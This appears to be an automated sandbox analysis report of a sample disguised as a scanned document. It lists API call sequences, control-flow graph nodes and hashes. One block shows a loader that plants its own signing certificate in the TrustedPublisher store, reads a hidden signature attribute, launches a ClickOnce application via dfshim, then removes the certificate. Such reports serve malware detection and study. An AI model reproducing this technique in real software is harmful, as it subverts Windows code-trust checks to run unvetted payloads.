6039->6011 6040->6039 6041->6028 6200 837a10 6203 837a27 6200->6203 6204 837a35 6203->6204 6205 837a49 6203->6205 6206 8347f9 _free 15 API calls 6204->6206 6207 837a63 6205->6207 6208 837a51 6205->6208 6209 837a3a 6206->6209 6211 833f72 __fassign 33 API calls 6207->6211 6215 837a22 6207->6215 6210 8347f9 _free 15 API calls 6208->6210 6212 83473d _abort 21 API calls 6209->6212 6213 837a56 6210->6213 6211->6215 6212->6215 6214 83473d _abort 21 API calls 6213->6214 6214->6215 6216 837419 6226 837fb2 6216->6226 6220 837426 6239 83828e 6220->6239 6223 837450 6224 834869 _free 15 API calls 6223->6224 6225 83745b 6224->6225 6243 837fbb 6226->6243 6228 837421 6229 8381ee 6228->6229 6230 8381fa ___scrt_is_nonwritable_in_current_image 6229->6230 6263 8356e2 EnterCriticalSection 6230->6263 6232 838270 6277 838285 6232->6277 6234 83827c _abort 6234->6220 6235 838244 DeleteCriticalSection 6237 834869 _free 15 API calls 6235->6237 6238 838205 6237->6238 6238->6232 6238->6235 6264 83901c 6238->6264 6240 8382a4 6239->6240 6242 837435 DeleteCriticalSection 6239->6242 6241 834869 _free 15 API calls 6240->6241 6240->6242 6241->6242 6242->6220 6242->6223 6244 837fc7 ___scrt_is_nonwritable_in_current_image 6243->6244 6253 8356e2 EnterCriticalSection 6244->6253 6246 83806a 6258 83808a 6246->6258 6249 838076 _abort 6249->6228 6251 837fd6 6251->6246 6252 837f6b 61 API calls 6251->6252 6254 837465 EnterCriticalSection 6251->6254 6255 838060 6251->6255 6252->6251 6253->6251 6254->6251 6261 837479 LeaveCriticalSection 6255->6261 6257 838068 6257->6251 6262 83572a LeaveCriticalSection 6258->6262 6260 838091 6260->6249 6261->6257 6262->6260 6263->6238 6265 839028 ___scrt_is_nonwritable_in_current_image 6264->6265 6266 839039 6265->6266 6267 83904e 6265->6267 6268 8347f9 _free 15 API calls 6266->6268 6276 839049 _abort 6267->6276 6280 837465 EnterCriticalSection 6267->6280 6270 83903e 6268->6270 6272 83473d _abort 21 API calls 6270->6272 6271 83906a 6281 838fa6 6271->6281 6272->6276 6274 839075 

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00831016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00831025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00831032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00831057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00831063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00831082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 008310B2
• LocalAlloc.KERNEL32(00000000,?), ref: 008310C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 008310F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0083110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0083111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0083112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00831134
• LocalFree.KERNEL32(00000000), ref: 0083113E
• LocalFree.KERNEL32(00000000), ref: 0083115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0083116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00831182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00831198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 008311A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 008311BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 008311C6
• Sleep.KERNELBASE(00009C40), ref: 008311E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 0083120B
• CertCloseStore.CRYPT32(?,00000000), ref: 0083121A
• LocalFree.KERNEL32(?), ref: 00831223
• LocalFree.KERNEL32(?), ref: 00831228
• LocalFree.KERNEL32(?), ref: 0083122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: 571c1e88af91253298dc4e7ded44eef01c53f1655e64d4f653be67600daa93ee
• Instruction ID: 3feae03af8a6cba2bfe753a5534caab866dedf190f7039afb631517176fe5970
• Opcode Fuzzy Hash: 571c1e88af91253298dc4e7ded44eef01c53f1655e64d4f653be67600daa93ee
• Instruction Fuzzy Hash: B2615EB1A40218AFEF259B95DC99FAFBBB5FF88B50F100415FB14B7290C77199018BA4
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0083192B
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 008319F7
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00831A10
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00831A1A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0083466B
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00834675
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00834682
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000,?,00833F66,00000003,0083209F,00831AFC), ref: 00833698
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000,?,00833F66,00000003,0083209F,00831AFC), ref: 0083369F
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 008336B1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0083A490,?,?,00000008,?,?,0083A130,00000000), ref: 0083A6C2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00831BEA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00831300), ref: 00831AB1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: 044527cae7d7e6d74c3dc42117e8e7226b5ba5dbd14f373ffdef468ea5882443
                                                                                                                                                                                                                                                                          • Instruction ID: 2b383102c972e64adf5570814072ea965e4d41fa11b2eca79549b2fd56b2ad0f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044527cae7d7e6d74c3dc42117e8e7226b5ba5dbd14f373ffdef468ea5882443
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: ce928809af104e2141df6c909f37af44e2abb7ef02206aa9d5e46f7146e58843
                                                                                                                                                                                                                                                                          • Instruction ID: c03dbdd9ade622bcd014a77922b17ec1b3ac84d06584486c9ae2983410a7862d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce928809af104e2141df6c909f37af44e2abb7ef02206aa9d5e46f7146e58843
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51A022B0300202CF8300CF30AF8A30C3BECBAC2AC0B020828B208C0030EB308080FF02

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0083654B
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836095
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360A7
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360B9
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360EF
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836101
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836113
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836125
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836137
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836149
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 0083615B
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 0083616D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836540
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836562
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836577
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836582
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365A4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365B7
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365C5
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365D0
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836608
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083660F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083662C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836644
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                                          • Opcode ID: f4d8af4bbb415d95cfac727ffb5628938c42b6f05f1da7c2a5f5b326fc17e537
                                                                                                                                                                                                                                                                          • Instruction ID: 0aa58a05655ed925fe02f84b9e736167698ad594127201e28a52f4ed87c7aad7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4d8af4bbb415d95cfac727ffb5628938c42b6f05f1da7c2a5f5b326fc17e537
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA315E71600605AFDB60AA7ED805B56B3E8FFC0350F149439E159D7191EF38EC608BA1

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834344
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834350
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083435B
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834366
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834371
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083437C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834387
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834392
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083439D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008343AB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: abf1090b3d4ffdc285116b74a67642fe4199695efe55e971c96ccfd8c34c5dea
                                                                                                                                                                                                                                                                          • Instruction ID: 081b6ebf7a0f0d9085f4fcdad70ca0bab1f0f6e5b754186e992022be0a1b7514
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abf1090b3d4ffdc285116b74a67642fe4199695efe55e971c96ccfd8c34c5dea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11A476600148EFCB41EF9AD842CD97BA5FF84750F0151A2BA188F262DA39EE519F81

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 165 837ab4-837acd 166 837ae3-837ae8 165->166 167 837acf-837adf call 8382cc 165->167 169 837af5-837b19 MultiByteToWideChar 166->169 170 837aea-837af2 166->170 167->166 174 837ae1 167->174 172 837b1f-837b2b 169->172 173 837cac-837cbf call 83123a 169->173 170->169 175 837b7f 172->175 176 837b2d-837b3e 172->176 174->166 178 837b81-837b83 175->178 179 837b40-837b4f call 83ac20 176->179 180 837b5d-837b63 176->180 182 837ca1 178->182 183 837b89-837b9c MultiByteToWideChar 178->183 179->182 192 837b55-837b5b 179->192 185 837b64 call 8362ff 180->185 187 837ca3-837caa call 83646a 182->187 183->182 186 837ba2-837bbd call 835a15 183->186 189 837b69-837b6e 185->189 186->182 197 837bc3-837bca 186->197 187->173 189->182 193 837b74 189->193 194 837b7a-837b7d 192->194 193->194 194->178 198 837c04-837c10 197->198 199 837bcc-837bd1 197->199 201 837c12-837c23 198->201 202 837c5c 198->202 199->187 200 837bd7-837bd9 199->200 200->182 205 837bdf-837bf9 call 835a15 200->205 203 837c25-837c34 call 83ac20 201->203 204 837c3e-837c44 201->204 206 837c5e-837c60 202->206 211 837c9a-837ca0 call 83646a 203->211 217 837c36-837c3c 203->217 208 837c45 call 8362ff 204->208 205->187 220 837bff 205->220 210 837c62-837c7b call 835a15 206->210 206->211 214 837c4a-837c4f 208->214 210->211 223 837c7d-837c84 210->223 211->182 214->211 219 837c51 214->219 222 837c57-837c5a 217->222 219->222 220->182 222->206 224 837cc0-837cc6 223->224 225 837c86-837c87 223->225 226 837c88-837c98 WideCharToMultiByte 224->226 225->226 226->211 227 837cc8-837ccf call 83646a 226->227 227->187
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,008354C8,00000000,?,?,?,00837D05,?,?,00000100), ref: 00837B0E
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00837B46
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00837D05,?,?,00000100,5EFC4D8B,?,?), ref: 00837B94
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00837C2B
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00837C8E
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837C9B
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837CA4
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837CC9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f2892da1b8f0fca2153b5d34cb905c6ce3789b5575e9915ed1491057ad444eb
                                                                                                                                                                                                                                                                          • Instruction ID: 00ffee6a1fce967d9c324a504a1959cbe66cc7a8eea1c11d80592e4dfa075973
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f2892da1b8f0fca2153b5d34cb905c6ce3789b5575e9915ed1491057ad444eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B351CDB2614216ABEB358F68CC81EAF77AAFBC4764F154628FC04D6140EB34DC41D6E0

                                                                                                                                                                                                                                                                          Control-flow Graph

